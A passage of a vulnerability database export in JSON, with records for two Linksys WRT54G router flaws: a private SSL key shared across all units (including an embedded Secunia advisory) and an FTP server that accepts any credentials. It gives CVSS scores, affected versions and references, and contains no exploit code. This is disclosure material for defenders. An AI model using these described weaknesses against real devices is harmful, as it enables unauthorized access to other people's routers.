"trust": 0.6
}
}
VAR-200508-0264
Vulnerability from variot - Updated: 2023-12-18 11:41Linksys WRT54G router uses the same private key and certificate for every router, which allows remote attackers to sniff the SSL connection and obtain sensitive information. This constant certificate/key pair is always used to access the device. This can allow an attacker to obtain the certificate/key pair and carry out various attacks. A complete compromise of the device is possible. Linksys WRT54G is a wireless router device that combines several functions.
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/
TITLE: Linksys WRT54G Router Common SSL Private Key Disclosure
SECUNIA ADVISORY ID: SA16271
VERIFY ADVISORY: http://secunia.com/advisories/16271/
CRITICAL: Less critical
IMPACT: Exposure of sensitive information
WHERE:
From local network
OPERATING SYSTEM: Linksys WRT54G Wireless-G Broadband Router http://secunia.com/product/3523/
DESCRIPTION: Nick Simicich has reported a security issue in WRT54G, which potentially can be exploited by malicious people to gain knowledge of certain sensitive information. A user with knowledge with the private key can potentially decrypt router management traffic captured from the network.
PROVIDED AND/OR DISCOVERED BY: Nick Simicich
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200508-0264",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": "wrt54g",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "wrt54g beta",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
}
],
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Nick Simicich njs@scifi.squawk.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.6
},
"cve": "CVE-2005-2434",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-13643",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2434",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200508-040",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-13643",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G router uses the same private key and certificate for every router, which allows remote attackers to sniff the SSL connection and obtain sensitive information. \nThis constant certificate/key pair is always used to access the device. \nThis can allow an attacker to obtain the certificate/key pair and carry out various attacks. \nA complete compromise of the device is possible. Linksys WRT54G is a wireless router device that combines several functions. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nLinksys WRT54G Router Common SSL Private Key Disclosure\n\nSECUNIA ADVISORY ID:\nSA16271\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/16271/\n\nCRITICAL:\nLess critical\n\nIMPACT:\nExposure of sensitive information\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nLinksys WRT54G Wireless-G Broadband Router\nhttp://secunia.com/product/3523/\n\nDESCRIPTION:\nNick Simicich has reported a security issue in WRT54G, which\npotentially can be exploited by malicious people to gain knowledge of\ncertain sensitive information. A user with knowledge with the\nprivate key can potentially decrypt router management traffic\ncaptured from the network. \n\nPROVIDED AND/OR DISCOVERED BY:\nNick Simicich\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "PACKETSTORM",
"id": "38955"
}
],
"trust": 1.35
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "14407",
"trust": 2.0
},
{
"db": "SECUNIA",
"id": "16271",
"trust": 1.8
},
{
"db": "NVD",
"id": "CVE-2005-2434",
"trust": 1.7
},
{
"db": "SECTRACK",
"id": "1014596",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040",
"trust": 0.7
},
{
"db": "XF",
"id": "21635",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20050728 VULNERABILITY IN LINKSYS ROUTER ACCESS",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-13643",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "38955",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"id": "VAR-200508-0264",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:41:45.634000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2434"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/14407"
},
{
"trust": 1.7,
"url": "http://securitytracker.com/id?1014596"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/16271"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/21635"
},
{
"trust": 1.0,
"url": "http://marc.info/?l=bugtraq\u0026m=112258422806340\u0026w=2"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/21635"
},
{
"trust": 0.6,
"url": "http://marc.theaimsgroup.com/?l=bugtraq\u0026m=112258422806340\u0026w=2"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/406749"
},
{
"trust": 0.1,
"url": "http://marc.info/?l=bugtraq\u0026amp;m=112258422806340\u0026amp;w=2"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/3523/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_vacancies/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/16271/"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-13643"
},
{
"db": "BID",
"id": "14407"
},
{
"db": "PACKETSTORM",
"id": "38955"
},
{
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-08-03T00:00:00",
"db": "VULHUB",
"id": "VHN-13643"
},
{
"date": "2005-07-28T00:00:00",
"db": "BID",
"id": "14407"
},
{
"date": "2005-08-02T23:53:24",
"db": "PACKETSTORM",
"id": "38955"
},
{
"date": "2005-08-03T04:00:00",
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"date": "2005-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-13643"
},
{
"date": "2005-07-28T00:00:00",
"db": "BID",
"id": "14407"
},
{
"date": "2017-07-11T01:32:50.640000",
"db": "NVD",
"id": "CVE-2005-2434"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Wireless Router Default SSL Certificate and Private Key Vulnerability",
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "14407"
},
{
"db": "CNNVD",
"id": "CNNVD-200508-040"
}
],
"trust": 0.9
}
}
VAR-200803-0064
Vulnerability from variot - Updated: 2023-12-18 11:27The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200803-0064",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.8,
"vendor": "cisco linksys",
"version": "7.00.1"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v1.077.00.1"
}
],
"sources": [
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:7:*:7.00.1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1268"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "85076"
}
],
"trust": 0.3
},
"cve": "CVE-2008-1268",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2008-1268",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-31393",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2008-1268",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200803-146",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-31393",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The FTP server on the Linksys WRT54G 7 router with 7.00.1 firmware does not verify authentication credentials, which allows remote attackers to establish an FTP session by sending an arbitrary username and password. WRT54G v1.0 is prone to a remote security vulnerability",
"sources": [
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "VULHUB",
"id": "VHN-31393"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2008-1268",
"trust": 2.8
},
{
"db": "XF",
"id": "41119",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20080301 THE ROUTER HACKING CHALLENGE IS OVER!",
"trust": 0.6
},
{
"db": "XF",
"id": "54",
"trust": 0.6
},
{
"db": "BID",
"id": "85076",
"trust": 0.4
},
{
"db": "VULHUB",
"id": "VHN-31393",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"id": "VAR-200803-0064",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T11:27:54.541000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Linksys",
"trust": 0.8,
"url": "http://home.cisco.com/en-apac/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://swbae.egloos.com/1701135"
},
{
"trust": 2.0,
"url": "http://www.gnucitizen.org/projects/router-hacking-challenge/"
},
{
"trust": 1.1,
"url": "http://www.securityfocus.com/archive/1/489009/100/0/threaded"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/41119"
},
{
"trust": 0.9,
"url": "http://xforce.iss.net/xforce/xfdb/41119"
},
{
"trust": 0.9,
"url": "http://www.securityfocus.com/archive/1/archive/1/489009/100/0/threaded"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1268"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-1268"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-31393"
},
{
"db": "BID",
"id": "85076"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-10T00:00:00",
"db": "VULHUB",
"id": "VHN-31393"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85076"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"date": "2008-03-10T17:44:00",
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"date": "2008-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-31393"
},
{
"date": "2008-03-10T00:00:00",
"db": "BID",
"id": "85076"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004207"
},
{
"date": "2018-10-11T20:31:26.137000",
"db": "NVD",
"id": "CVE-2008-1268"
},
{
"date": "2008-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G 7 On the router FTP On the server FTP Session establishment vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004207"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200803-146"
}
],
"trust": 0.6
}
}
VAR-200803-0170
